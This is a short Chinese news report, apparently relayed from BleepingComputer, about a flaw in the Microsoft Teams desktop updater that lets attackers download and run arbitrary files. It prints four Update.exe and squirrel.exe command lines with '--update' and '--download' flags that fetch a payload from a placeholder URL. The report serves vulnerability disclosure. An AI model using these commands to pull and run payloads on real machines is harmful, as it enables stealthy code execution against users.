Microsoft Teams 升級機制允許黑客執行任意文件

雷鋒網消息，據 BleepingComputer 美國時間 6 月 29 日報道，多位安全研究人員發現當前在Microsoft Teams桌面應用中實現的「update」升級機制允許黑客在系統上下載和執行任意文件，

研究人員表示，對易受攻擊的應用程序使用「update」命令可以在當前用戶的上下文中執行任意二進位文件。目前，研究人員已向微軟報告了這個問題。

使用Microsoft Teams，將有效負載添加到其文件夾中，並使用以下任一命令自動執行：

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

這些命令可以與其他參數一起使用，包括「download」，它允許從遠程位置以NuGet包的形式檢索有效負載。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的方法適用於「squirrel.exe」，它也是Microsoft Teams安裝包的一部分。這兩個可執行文件現在都是GitHub上的Living Off The Land Binaries and Scripts（LOLBAS）資料庫的一部分。

安全研究員 Reegun Richard 在 6 月 4 日向微軟團隊報告了這個問題。此時，應用程序仍然容易受到攻擊，因為微軟通知研究員該修復程序將在未來的軟體版本中出現。

來源：BleepingComputer 。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！